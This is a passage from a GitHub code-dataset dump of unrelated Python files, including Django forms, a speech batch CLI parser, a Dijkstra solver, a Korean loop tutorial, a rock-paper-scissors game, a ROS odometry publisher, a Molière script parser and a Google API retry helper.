['removed', 'status', ]\n        widgets = { 'datafile': ClearableFileInputPretty}\n\nclass LcChoiceField(ModelChoiceField):\n    def label_from_instance(self, obj):\n        return \"%s - %s\" % (obj.application.name, obj.name)\n\nclass IIForm(ModelForm):\n    target = LcChoiceField(queryset=LogicalComponent.objects.filter(implemented_by__installation_methods__restoration_only = False, implemented_by__installation_methods__available = True).annotate(num_methods=Count('implemented_by__installation_methods')).filter(scm_trackable=True).filter(num_methods__gt = 0).order_by('application__name', 'name'), label='Delivered component')\n    version = forms.CharField(label='Delivered version')\n\n    def save(self, commit=True):\n        logicalcompo = self.cleaned_data['target']\n        version = self.cleaned_data['version']\n        v = LogicalComponentVersion.objects.get_or_create(logical_component=logicalcompo, version=version)[0]\n        v.save()\n        self.instance.what_is_installed = v\n        o = super(IIForm, self).save(commit)\n        return o\n\n    def clean_how_to_install(self):\n        data = self.cleaned_data['how_to_install']\n        deleted = 'DELETE' in self.cleaned_data\n        if len(data) == 0 and not deleted:\n            raise forms.ValidationError(\"At least one technical target is required\")\n        return data\n\n    def clean_datafile(self):\n        dfile = self.cleaned_data['datafile']\n        try:\n            target = self.cleaned_data['target']\n        except KeyError:\n            return dfile\n        methods = self.cleaned_data['how_to_install']\n\n        if len(methods) == 0:\n            return dfile\n        for method in methods:\n            if method.checkers.count() > 0 and (dfile is None or dfile == False):\n                raise forms.ValidationError('A datafile is required')\n        if dfile == False: ## Cleared file\n            return dfile\n\n        for method in methods:\n            method.check_package(dfile, target)\n        return dfile\n\n    def clean(self):\n        cleaned_data = super(IIForm, self).clean()\n\n        ## Check how_to_install consistency\n        if 'target' in self.cleaned_data and 'how_to_install' in self.cleaned_data:\n            logicalcompo = self.cleaned_data['target']\n            htis = self.cleaned_data['how_to_install']\n            for hti in htis:\n                if not logicalcompo in [i.implements for i in hti.method_compatible_with.all()]:\n                    raise 
forms.ValidationError(\"Inconsistent choice - that method is not compatible with this target\")\n\n ## Check datafile according to hpow_to_install\n ##self.clean_datafile2()\n\n ## Done\n return cleaned_data\n\n def __init__(self, project, *args, **kwargs):\n super(IIForm, self).__init__(*args, **kwargs)\n self.fields['how_to_install'].queryset = InstallationMethod.objects.filter(restoration_only=False)\n\n if 'application' in kwargs:\n self.fields['target'].queryset = self.fields['target'].queryset.filter(application=kwargs['application'])\n kwargs.remove('application')\n self.fields['target'].queryset = self.fields['target'].queryset.filter(application__project=project)\n\n if self.instance != None and self.instance.pk is not None:\n self.initial['target'] = self.instance.what_is_installed.logical_component.pk\n self.initial['version'] = self.instance.what_is_installed.version\n\n class Meta:\n model = InstallableItem\n # exclude = ['what_is_installed',]\n fields = ('target', 'version', 'how_to_install', 'is_full', 'data_loss', 'datafile') # 'what_is_installed')\n widgets = { 'datafile': ClearableFileInputPretty}\n\n\nclass IDForm(ModelForm):\n #target = LcChoiceField(queryset=LogicalComponent.objects.filter(scm_trackable=True, implemented_by__installation_methods__isnull=False).distinct().order_by('application__name', 'name'), label='dépend de ', required=False)\n target = LcChoiceField(queryset=LogicalComponent.objects.all())\n # TODO: make query right\n\n class Meta:\n model = ItemDependency\n fields = ('target', 'depends_on_version', 'operator',)\n\n def __init__(self, project, *args, **kwargs):\n super(IDForm, self).__init__(*args, **kwargs)\n \n self.fields['target'].queryset = self.fields['target'].queryset.filter(application__project=project)\n","repo_name":"marcanpilami/MAGE","sub_path":"scm/views/delivery_handoff_forms.py","file_name":"delivery_handoff_forms.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"28360776904","text":"import argparse\nfrom argparse import Namespace\nimport tempfile\n\n\ndef check_positive(value):\n \"\"\"\n Ensure an argument is positive integer\n :param value: argument to check\n :return: integer cast of the passed in value\n \"\"\"\n int_value = int(value)\n if int_value <= 0:\n raise argparse.ArgumentTypeError(\"{0} is not a positive int value\".format(value))\n return int_value\n\n\ndef create_parser():\n parser = argparse.ArgumentParser(\n description='Run a Speech SDK batch client for batch transcription of audio files',\n add_help=True,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-config', '--configuration-file',\n default=\"/usr/local/batch/input/config.yaml\",\n help='configuration file holding the information about endpoints, ports and concurrency'\n )\n parser.add_argument(\n '-output_folder', '--output-folder',\n default=\"/usr/local/batch/output\",\n help='Folder to store transcriptions and logs. Use with --run-mode ONESHOT or DAEMON.'\n )\n parser.add_argument(\n '-input_folder', '--input-folder',\n default=\"/usr/local/batch/input\",\n help=\"Folder where audio files are stored. Use with --run-mode ONESHOT or DAEMON.\"\n )\n parser.add_argument(\n '-log_folder', '--log-folder',\n default=None,\n help=\"Folder where logs are stored. 
If not provided, logs will not be written to file.\"\n )\n parser.add_argument(\n '-console_log_level', '--console-log-level',\n choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],\n default='INFO', help=\"Set the console logging level\"\n )\n parser.add_argument(\n '-file_log_level', '--file-log-level',\n choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],\n default='INFO', help=\"Set the file logging level\"\n )\n parser.add_argument(\n '-nbest', '--nbest',\n default=1, type=check_positive,\n help=\"How many maximum results to consider per recognition\"\n )\n parser.add_argument(\n '-combined_json', '--store-combined-json',\n default=False, action='store_true',\n help=\"whether to also produce a combined JSON result for the entire run\"\n )\n parser.add_argument(\n '-input_list', '--input-list',\n help=\"File containing list of audio files to process. If not provided all files in \"\n \"the input folder are considered. Use with --run-mode ONESHOT only.\"\n )\n parser.add_argument(\n '-m', '--run-mode',\n default='ONESHOT', choices=['ONESHOT', 'DAEMON', 'APISERVER'],\n help=\"whether to run in a daemon mode listening to more changes in the input folder\"\n )\n parser.add_argument(\n '-scratch_folder', '--scratch-folder',\n required=False,\n help=\"[Optional] Scratch folder will be created if it doesn't\"\n \"exist and is cleaned on exit. If unspecified, a temporary\"\n \"directory is used under /tmp\"\n )\n parser.add_argument(\n '-diarization', '--diarization-mode',\n default='None', choices=['None', 'Identity', 'Anonymous'],\n help=\"diarization mode selection\"\n )\n parser.add_argument(\n '-language', '--language', nargs='+', default=\"en-US\",\n help=\"Space-separated list of candidate languages for transcription.\\n\"\n \" Example: --language en-US \\n\"\n \" Example: --language en-US fr-FR de-DE \\n\"\n \"If exactly one language is provided, no language segmentation is performed and you do not need \"\n \"Language Identification (LID) endpoints in your config. With two or more languages, you must have at \"\n \"least one LID endpoint listed in your config available for multi-language segmentation to run first. \"\n \"Each LID endpoint should be marked with language 'lid' in the endpoint config.\"\n )\n parser.add_argument(\n '-strict_config', '--strict-configuration-validation',\n default=False, action='store_true',\n help=\"whether to fail an invalid configuration file\"\n )\n parser.add_argument(\n '-profanity', '--profanity-mode',\n default='Masked', choices=['Masked', 'Raw', 'Removed'],\n help=\"how to handle profanity in the response\"\n )\n parser.add_argument(\n '-sentiment', '--enable-sentiment', default=False, action='store_true',\n help=\"Enable sentiment analysis\"\n )\n parser.add_argument(\n '-resume', '--allow-resume', default=False, action='store_true',\n help=\"whether to allow resuming from a failed transcription (WARNING: results may differ)\"\n )\n parser.add_argument(\n '-port', '--apiserver_port', default=5000, type=check_positive,\n help=\"Port for listening when using APISERVER mode\"\n )\n parser.add_argument(\n '-poll', '--poll', default=False, action='store_true',\n help=\"In DAEMON mode, toggle to periodically poll the input directory for new files instead of relying \"\n \"only on the Posix Watches facility. This is needed to make DAEMON mode work with filesystems that \"\n \"do not support Posix Watches, for example CIFS mount. Polling is an increased burden on the filesystem. 
\"\n \"Applies to --run-mode DAEMON only.\"\n )\n parser.add_argument(\n '-max_segment_length', '--max-segment-length',\n default=3600, type=check_positive,\n help=\"[Applies when multiple --language given only].\"\n \"Cap the maximum audio segment length produced during language segmentation. \"\n \"Longer segments will be broken up into smaller ones. Unit: positive integer seconds.\"\n )\n parser.add_argument(\n '-debug_loop_interval', '--debug-loop-interval',\n default=0, type=check_positive,\n help=\"Interval in seconds to re-log debug information about the batchkit's orchestration components. \"\n \"Useful for debugging. The default value of 0 means this information is not logged. \"\n )\n return parser\n\n\ndef parse_cmdline(args=None) -> Namespace:\n \"\"\"\n Create a command line parser for the batch client, and parse arguments\n :param args: arguments to parse\n :return: parsed command line arguments\n \"\"\"\n parser = create_parser()\n args: Namespace = parser.parse_args(args=args)\n\n if args.input_list is not None and args.run_mode != 'ONESHOT':\n parser.error(\"argument -input_list/--input-list: not allowed if the run mode is not ONESHOT\")\n\n if args.scratch_folder is None:\n args.scratch_folder = tempfile.mkdtemp()\n\n if isinstance(args.language, list) and len(args.language) > 1 and args.run_mode != 'ONESHOT':\n parser.error(\"Multi-language speech-batch-kit can only be used in ONESHOT mode in this version.\")\n\n if isinstance(args.language, str):\n args.language = [args.language]\n\n return args\n","repo_name":"microsoft/batch-processing-kit","sub_path":"batchkit_examples/speech_sdk/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"72553962152","text":"import sys, heapq\n\nV, E = map(int,input().split())\n\nK = int(input())\n\ngraph = [[] for y in range(V + 1)]\n\nINF = int(1e9)\nfor _ in range(E):\n u, v, w = map(int, sys.stdin.readline().rstrip().split())\n graph[u].append((v,w)) #u에서 v까지 갈때 걸리는 비용 w\n\n#print(graph)\n\nD = [INF] * (V + 1)\n\ndef dijkstra(start):\n qq = []\n heapq.heappush(qq,(0,start)) #(거리, 시작점) 자기자신은 거리가 0\n\n while qq:\n dist, now = heapq.heappop(qq)\n if D[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < D[i[0]]:\n D[i[0]] = cost\n heapq.heappush(qq, (cost,i[0]))\n\ndijkstra(K)","repo_name":"jayyeong/Algorithm","sub_path":"메모장/다익스트라 복습.py","file_name":"다익스트라 복습.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17330848767","text":"from os.path import dirname\n\n####################################################\n######## global configs #########\n####################################################\n\nnaming_scheme = 's2m2rf'\nmain_acc = 'test_acc'\nfirth_reg_col = 'firth_coeff'\nPROJPATH = f'{dirname(dirname(__file__))}'\nsmry_tbls_dir = f'{PROJPATH}/summary'\npaper_tbls_dir = f'{PROJPATH}/tables'\n\n####################################################\n######## csv2summ configs #########\n####################################################\n\nreg_sources = ['test']\nsumm_cond_vars = ['source_dataset', 'target_dataset', 'n_ways', 'n_shots', 'n_aug']\nresults_csv_dir = f'{PROJPATH}/results'\n# generating the path to the files to be read\n# provided by a seperate .py file\nspecific_csv_fldrs = ['1_mini2CUB', '2_tiered2CUB', '3_tiered2tiered', '4_5ways']\ndeprecated_cols = 
[]\nprop_cols = ['n_shots', 'n_ways', 'source_dataset', 'target_dataset',\n 'backbone_method', 'backbone_arch', 'split']\nprop_cols = prop_cols + deprecated_cols\ncrn_cols = ['rng_seed', 'task_id']\ndfltvals_dict = dict()\n\n####################################################\n######## summ2tables configs #########\n####################################################\n\ntable_sep_cols = ['target_dataset', 'source_dataset', 'n_ways', 'n_shots']\nrow_tree = [\"n_ways\", \"n_shots\"]\ncol_tree = [\"source2target\", \"print_name\"]\n\nscale_percent = 100\n","repo_name":"ehsansaleh/code_dcf","sub_path":"utils/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70428829353","text":"from PythonFile import Frog\n\nclass Log(Frog):\n\n\tdef __init__(self,num,isActive):\n\t\tsuper().__init__(1)\n\t\tself.isActive = isActive\n\n\tdef get_isActive(self):\n\t\treturn self.isActive\n\nl = Log(1,True)\nl.addOne()\nprint(l.get_isActive())","repo_name":"Mallet1/PreGithub_11-24-2021","sub_path":"PythonLearning/Python OOP - Unfinished/Inheritance Across Files.py","file_name":"Inheritance Across Files.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39578894665","text":"'''\r\n제어문 : 반복문(while)\r\n\r\nwhile 조건식 :\r\n 실행문\r\n 실행문\r\n'''\r\n\r\n\r\n# 카운터, 누적 변수\r\ncnt = tot = 0 # 변수 초기화\r\n\r\nwhile cnt < 5 :\r\n cnt += 1 # 카운터 변수\r\n tot += cnt # 누적 변수\r\n print(cnt, tot, end=\" / \")\r\n# 1 1 / 2 3 / 3 6 / 4 10 / 5 15 /\r\n\r\nwhile cnt < 5 : # True -> Loop(명령문 집합) 실행\r\n pass # 아무것도 하지않는다.\r\n break\r\n\r\n# ex1) 1 ~ 100 까지 합 출력하기\r\ncnt = tot = 0\r\nwhile cnt < 100 :\r\n cnt += 1\r\n tot += cnt\r\nprint(\"1~100까지 합 : %d\"%(tot)) # 1~100까지 합 : 5050\r\nprint(\"1~100까지 합 :\", tot)\r\n\r\n# ex2) 1 ~ 100 까지 짝수 출력\r\ncnt = 0\r\ndata = [] # 빈 list(짝수 저장)\r\nwhile cnt < 100 :\r\n cnt += 1\r\n if cnt % 2 == 0 :\r\n data.append(cnt) # 짝수 값 추가\r\nprint(\"짝수 값 :\", data)\r\n\r\n# ex3) 1 ~ 100 사이에서 5의배수 이면서 3의배수가 아닌값만 append 하기\r\ncnt = 0\r\ndata = []\r\nwhile cnt < 100 :\r\n cnt += 1\r\n if cnt % 5 == 0 and cnt % 3 != 0 :\r\n data.append(cnt)\r\nprint(\"5의배수 이면서 3의배수가 아닌값 :\", data)\r\n# 5의배수 이면서 3의배수가 아닌값 : [5, 10, 20, 25, 35, 40, 50, 55, 65, 70, 80, 85, 95, 100]\r\n\r\n''' 무한 loop -> 종료 조건 \r\n종료 조건 : 0이면 종료한다.'''\r\nwhile True :\r\n num = int(input(\"숫자 입력 : \"))\r\n if num == 0 :\r\n print(\"프로그램 종료\")\r\n break # 탈출(exit) : 종료 조건\r\n print(\"num =\", num)\r\n\r\n# random : 난수 생성\r\nimport random # 난수 생성 모듈\r\nhelp(random.random) # random() -> x in the interval [0, 1).\r\nhelp(random.choice) # Choose a random element from a non-empty sequence.\r\nhelp(random.randint) # Return random integer in range [a, b], including both end points.\r\nr = random.randint(1,5) # 모듈.함수 (1~5 난수)\r\nprint(r)\r\nr = random.random() # 모듈.함수(0~1 난수)\r\nprint('r =', r)\r\n'''r = 0.7022488599032701\r\n r = 0.9936632464625869\r\n r = 0.3603851296759477'''\r\n\r\n# ex4) 난수 0.01미만이면 프로그램 종료, 아니면 난수 개수 출력\r\ncnt = 0\r\nwhile True :\r\n r = random.random()\r\n cnt += 1\r\n if r < 0.01 :\r\n print(\"프로그램 종료\")\r\n break\r\nprint(\"난수 갯수 :\", cnt, \"개 \\n r :\", r)\r\n'''프로그램 종료\r\n난수 갯수 : 36 개\r\n r : 0.009539250499327023\r\n프로그램 종료\r\n난수 갯수 : 178 개\r\n r : 0.006572568922237676 '''\r\n# 똑같음\r\ncnt = 0\r\nwhile True :\r\n r = random.random()\r\n if r < 0.01 :\r\n print(\"프로그램 종료\")\r\n break\r\n else :\r\n cnt += 
1\r\nprint(\"난수 갯수 :\", cnt, \"개\")\r\n'''프로그램 종료\r\n난수 갯수 : 176 개'''\r\n\r\n\r\n# 게임 만들어보기\r\nprint(\">>> 숫자 맞추기 게임 <<<\")\r\n'''\r\n숫자 범위 : 1 ~ 10\r\nmyInput == computer : 성공(exit) -> 종료 조건 \r\nmyInput > computer : '더 작은 수 입력'\r\nmyInput < computer : ' 더 큰 수 입력'\r\n'''\r\ncomputer = random.randint(1,10)\r\nwhile True :\r\n myInput = int(input(\"예상 숫자 입력 : \")) # 사용자 입력\r\n if myInput == computer :\r\n print('~~성공~~')\r\n break\r\n elif myInput > computer :\r\n print('~~더 작은 수 입력~~')\r\n else :\r\n print('~~더 큰 수 입력~~')\r\n'''예상 숫자 입력 : >? 5\r\n~~더 작은 수 입력~~\r\n예상 숫자 입력 : >? 4\r\n~~더 작은 수 입력~~\r\n예상 숫자 입력 : >? 2\r\n~~성공~~'''\r\n\r\n\r\n'''\r\ncontinue vs break\r\n - 반복문에서 사용되는 명령어\r\n - continue : 반복을 지속\r\n - break : 반복을 멈춤\r\n'''\r\ni = 0\r\nwhile i < 10 :\r\n i += 1\r\n if i == 3 or i == 6 :\r\n continue # 다음 문장으로 skip\r\n if i == 9 :\r\n break\r\n print(i, end=' , ')\r\n# 1 , 2 , 4 , 5 , 7 , 8 ,\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yangmyongho/3_Python","sub_path":"chap02_Control_lecture/step02_while.py","file_name":"step02_while.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38258989496","text":"#!/usr/bin/env python\n\n\nimport math\nfrom math import sin, cos, pi\n\nimport rospy\nimport tf\nfrom std_msgs.msg import Time\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Point, Pose, Quaternion, Twist, Vector3\n\nrospy.init_node(\"pub_node\")\n\npub2 = rospy.Publisher('/husky_velocity_controller/odom', Odometry, queue_size=50)\n\nodom_broadcaster = tf.TransformBroadcaster()\n\nx = 0.0\ny = 0.0\nth = 0.0\n\nvx = 0.1\nvy = -0.1\nvth = 0.1\n\ncurrent_time = rospy.Time.now()\nlast_time = rospy.Time.now()\n\nr = rospy.Rate(1.0)\n\nwhile not rospy.is_shutdown():\n\tdt = (current_time - last_time).to_sec()\n\tdelta_x = (vx * cos(th) - vy * sin(th)) * dt\n\tdelta_y = (vx * sin(th) + vy * cos(th)) * dt\n\tdelta_th = vth * dt\n\n\tx += delta_x\n\ty += delta_y\n\tth += delta_th\n\n\todom_quat = tf.transformations.quaternion_from_euler(0, 0, th)\n\n\todom_broadcaster.sendTransform(\n\t\t(x, y, 0.),\n\t\todom_quat,\n\t\tcurrent_time,\n\t\t\"base_link\",\n\t\t\"odom\"\n\t)\n\n\todom = Odometry()\n\todom.header.stamp = current_time\n\todom.header.frame_id = \"odom\"\n\n\todom.pose.pose = Pose(Point(x, y, 0.), Quaternion(*odom_quat))\n\n\todom.child_frame_id = \"base_link\"\n\todom.twist.twist = Twist(Vector3(vx, vy, 0), Vector3(0, 0, vth))\n\n\tpub2.publish(odom)\n\n\tlast_time = current_time\n\tr.sleep()","repo_name":"FOSCAR-2020/ISCC_2020","sub_path":"etc/gps_test/google_map_gps_test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"36101036710","text":"import re\nimport os\nimport sys\nimport regex\n\nfilename = sys.argv[1]\n# garder seulement le nom de fichier sans path.\ntitle = os.path.basename(filename)\ntitle = re.sub(\".txt\", \"\", title)\nstr = \"\"\nperson = \"\" # la personne qui parle.\ni = 0\nfin = open(title + \"_input.txt\", \"w\")\nfout = open(title + \"_target.txt\", \"w\")\nfres = open(title + \"_res.txt\", \"w\")\np1 = []\np2 = []\npr1 = []\npr2 = []\n\ndef chomp(x):\n if x.endswith(\"\\r\\n\"): return x[:-2]\n if x.endswith(\"\\n\") or x.endswith(\"\\r\"): return x[:-1]\n return x\n\nwith open(filename, 'r') as f:\n begin = False\n start = False\n skip = False\n input = False\n for line in f:\n if skip:\n skip = not skip\n 
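# NOTE: 'skip' is a one-shot flag here -- the single line right after a \"Scène\" heading is swallowed, then the flag flips back to False\n            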
continue\n if \"Scène\" in line:\n start = True\n skip = True\n if not start:\n continue\n if line == \"\\n\" or \"#\" in line or \"<\" in line or \"SCÈNE\" in line or \"===\" in line:\n continue\n if re.match(' ', line): # ligne avec la personne\n input = not input\n person = line.strip()\n person = re.sub('\\.', '', person) # supprimer les points\n person = re.sub(',.*', '', person) # supprimer les personne a qui parle\n if input:\n fin.write(person + \"\\n\")\n else:\n fout.write(person + \"\\n\")\n begin = True\n i = 0\n continue\n if begin == True:\n str = line.strip().lower()\n str = \"\".join(str)\n str = re.sub('\"', '', str)\n if len(str) > 120:\n str = re.sub(', ', '\\n', str)\n str = re.sub('\\. ', \".\\n\", str)\n str = re.sub('\\.\\* ', \".\\n*\", str)\n str = re.sub(': ', ':\\n', str)\n str = re.sub(', \\*', ',\\n*', str)\n str = re.sub('\\? ', '?\\n', str)\n str = re.sub(\"! \", \"!\\n\", str)\n str = re.sub('et ', '\\net ', str)\n str = re.sub(', \\*', ',\\n*', str)\n str = re.sub('; ', '\\n', str)\n str = re.sub('mais ', '\\nmais ', str)\n splited = str.split('\\n')\n str = \"\"\n strl = \"\"\n i = 0\n enter = False\n final = False\n while i < len(splited):\n strl = splited[i].strip()\n while len(strl) <= 60:\n i += 1\n if i >= len(splited):\n final = True\n break\n strl += ' ' + splited[i]\n enter = True\n if final:\n break\n strl += '\\n'\n enter = False\n i += 1\n str += strl\n # print(str)\n i += 1\n # if i % 2 == 0:\n # str += \"\\n\"\n if input:\n fin.write(chomp(str) + '\\n')\n else:\n fout.write(chomp(str) + '\\n')\nfin.close()\nfout.close()\n\nwith open(title + \"_input.txt\", 'r') as f:\n for line in f:\n if regex.match('^\\w[[:upper:]]', line): # ligne avec la personne\n p1.append(pr1)\n pr1 = []\n i = 0\n continue\n pr1.append(chomp(line))\n\nwith open(title + \"_target.txt\", 'r') as f:\n for line in f:\n if regex.match('^\\w[[:upper:]]', line): # ligne avec la personne\n p2.append(pr2)\n pr2 = []\n i = 0\n continue\n pr2.append(chomp(line))\n\n\nnp1 = []\nnp2 = []\nfor i in range(len(p1)):\n t1 = []\n for n in range(0, len(p1[i]), 2):\n if ((n + 1) % len(p1[i]) != 0):\n t1.append(p1[i][n] + ' ' + p1[i][n + 1])\n else:\n t1.append(p1[i][n])\n if len(t1) != 0:\n np1.append(t1)\n \nfor i in range(len(p2)):\n t2 = []\n for n in range(0, len(p2[i]), 2):\n if ((n + 1) % len(p2[i]) != 0):\n t2.append(p2[i][n] + ' ' + p2[i][n + 1])\n else:\n t2.append(p2[i][n])\n if len(t2) != 0:\n np2.append(t2)\n\n# print(len(np1))\n# print(len(np2))\nm = min(len(np1), len(np2))\nfor i in range(m):\n maxi = max(len(np1[i]), len(np2[i]))\n for n in range(maxi):\n fres.write('\"' + np1[i][n % len(np1[i])] + '\"' + ',' + '\"' + np2[i][n % len(np2[i])] + '\"' + '\\n')\nfres.close()\n","repo_name":"emilraducanu/litte_bot","sub_path":"Data/Old_format/parseur_moliere_new.py","file_name":"parseur_moliere_new.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36530373972","text":"import random\n\nrock = \"\"\"\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n\"\"\"\n\npaper = \"\"\"\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n\"\"\"\n\nscissors = \"\"\"\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n\"\"\"\n\nhand = [rock, paper, scissors]\nhands = [\"rock\", \"paper\", \"scissors\"]\n\nuserInput = int(\n input(\"What do you choose? 
Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\")\n)\nnpcInput = random.randint(0, 2)\n\nif userInput > 2:\n print(\"Enter a valid number.\")\n exit()\nelse:\n userHand = hands[userInput]\n npcHand = hands[npcInput]\n\n print(f\"You chose {userHand}\\n{hand[userInput]}\")\n print(f\"NPC chose {npcHand}\\n{hand[npcInput]}\")\n\n if userHand == npcHand:\n print(\"Draw\")\n elif userHand == \"rock\":\n if npcHand == \"paper\":\n print(\"You lose.\")\n else:\n print(\"You win!\")\n elif userHand == \"paper\":\n if npcHand == \"scissors\":\n print(\"You lose.\")\n else:\n print(\"You win!\")\n elif userHand == \"scissors\":\n if npcHand == \"rock\":\n print(\"You lose.\")\n else:\n print(\"You win!\")\n","repo_name":"miguel-tostado/100_Days_of_Code_Python","sub_path":"day_4/day_4_project.py","file_name":"day_4_project.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16318453817","text":"# 环境必须安装过httpie\n# python 3.5 后调用 要加上 --ignore-stdin\n# 命令行调用http请求\nimport time\nimport subprocess\n\ncommand1 =\"ipconfig /all\"\n\ncommand2 =\"http devcoder.cn -h --ignore-stdin\"\n\n# subprocess.call(command1, shell = True)\nif __name__ == '__main__':\n while(True):\n subprocess.call(command2, shell = True)\n time.sleep(1)\n","repo_name":"AllenCoder/Python","sub_path":"httpies.py","file_name":"httpies.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10935605018","text":"\"\"\"\nFunctions for Google API\n\"\"\"\n\nimport json\nimport logging\nimport time\n\nfrom googleapiclient import errors\nfrom googleapiclient.discovery import build, DISCOVERY_URI\n\n_REQUIRED_CONFIG_KEYS = frozenset((\"auth_uri\", \"token_uri\", \"client_id\"))\n\n\nclass GoogleApi(object):\n \"\"\"Google API helper object\"\"\"\n\n def __init__(self, api=\"oauth2\", version=\"v2\", scopes=None, **kwargs):\n \"\"\"constructor\"\"\"\n if scopes is None:\n scopes = ['https://www.googleapis.com/auth/analytics.readonly']\n self.api = api\n self.api_version = version\n self.scopes = scopes\n self.credentials = kwargs.get('credentials')\n self._service = None\n self.discovery_url = kwargs.get('discovery_url', DISCOVERY_URI)\n self.retries = kwargs.get('retries', 3)\n self.log = logging.getLogger(\"__name__\")\n\n @property\n def service(self):\n \"\"\"get or create a api service\"\"\"\n if self._service is None:\n # self.log.debug(f\"Creating a service for {self.api} API\")\n self._service = build(self.api,\n self.api_version,\n credentials=self.credentials,\n cache_discovery=False,\n discoveryServiceUrl=self.discovery_url)\n return self._service\n\n def retry(self, service_method, retry_count=0):\n \"\"\"retry a google api call and check for rate limits\n \"\"\"\n try:\n return service_method.execute(num_retries=retry_count)\n except errors.HttpError as e:\n code = e.resp.get('code')\n # reason = ''\n message = ''\n try:\n data = json.loads(e.content.decode('utf-8'))\n code = data['error'][\"code\"]\n message = data['error']['message']\n # reason = data['error']['errors'][0]['reason']\n except: # noqa\n pass\n if code == 403 and \"rate limit exceeded\" in message.lower():\n self.log.debug(\"rate limit reached, sleeping for %s seconds\", 2 ** retry_count)\n time.sleep(2 ** retry_count)\n return self.retry(service_method, retry_count + 1)\n else:\n self.log.debug(f\"got HttpError (content={data}\")\n raise\n except 
BrokenPipeError:\n self.log.debug(\"BrokenPipeError occurred but attempting to retry\")\n return self.retry(service_method, retry_count + 1)\n except KeyboardInterrupt:\n raise\n except: # noqa\n self.log.exception(\"Failed to execute api method\")\n raise\n\n def __getattr__(self, name):\n \"\"\"get attribute or service wrapper\n :param name: attribute / service name\n :return:\n \"\"\"\n return getattr(MethodHelper(self, self.service), name)\n\n\nclass MethodHelper(object):\n \"\"\"helper to streamline api calls\"\"\"\n\n def __init__(self, google_api, service, name=None, path=None):\n \"\"\"create a method helper\n :param google_api GoogleApi instance of api\n :param service Google API service (GoogleApi.service) or method of it\n :param name method name\n :param path API path i.e. for compute: instances.list\n \"\"\"\n self.google_api = google_api\n self.service = service\n self.name = name\n self.path = path if path is not None else []\n if name is not None:\n self.path.append(name)\n # print(\"constructor %s\", name)\n\n def execute(self, *args, **kwargs):\n \"\"\"execute service api\"\"\"\n # self.log.info(\"execute %s\", self.name)\n return self.google_api.retry(self.service)\n\n def call(self, *args, **kwargs):\n \"\"\"wrapper for service methods\n this wraps an GoogleApi.service call so the next level can also use helpers\n i.e. for compute v1 api GoogleApi.service.instances() can be used as Google.instances()\n and will return a MethodHelper instance\n \"\"\"\n # self.log.info(\"call %s\", self.name)\n return MethodHelper(self.google_api, getattr(self.service, self.name)(*args, **kwargs))\n\n def __getattr__(self, name):\n \"\"\"get service method\"\"\"\n # self.log.info(\"getattr %s\", name)\n if not hasattr(self.service, name):\n err_msg = u\"API method {} unknown on {} {}\".format(u\".\".join(self.path + [name]),\n self.google_api.api,\n self.google_api.api_version)\n raise RuntimeError(err_msg)\n return MethodHelper(self.google_api, self.service, name, self.path).call\n","repo_name":"mak00s/megaton","sub_path":"megaton/google_api.py","file_name":"google_api.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1368932236","text":"from text_handlers import *\nfrom pandas import read_csv\n\ndata_dir = '/home/justin/.local/share/xdg/media/documents/textfiles/galvanize/slur-prediction/'\nfilename='data_with_n_grams.csv'\n\ndata = read_csv(data_dir+filename)\n\nblowup_cols = [col for col in data if col.endswith('gram')]\n\nfor col in blowup_cols:\n data = make_dummies(data,col)\n\nprint(data.shape)\n","repo_name":"justin-riley/slur-prediction","sub_path":"src/data_pipeline.py","file_name":"data_pipeline.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32358953312","text":"#Python内置的访问数据库\nimport requests\n#pyecharts图表库导入(Map地图,Line折线图,Bar柱形图)\nfrom pyecharts import Map,Line,Bar\n#将json导入\nimport 
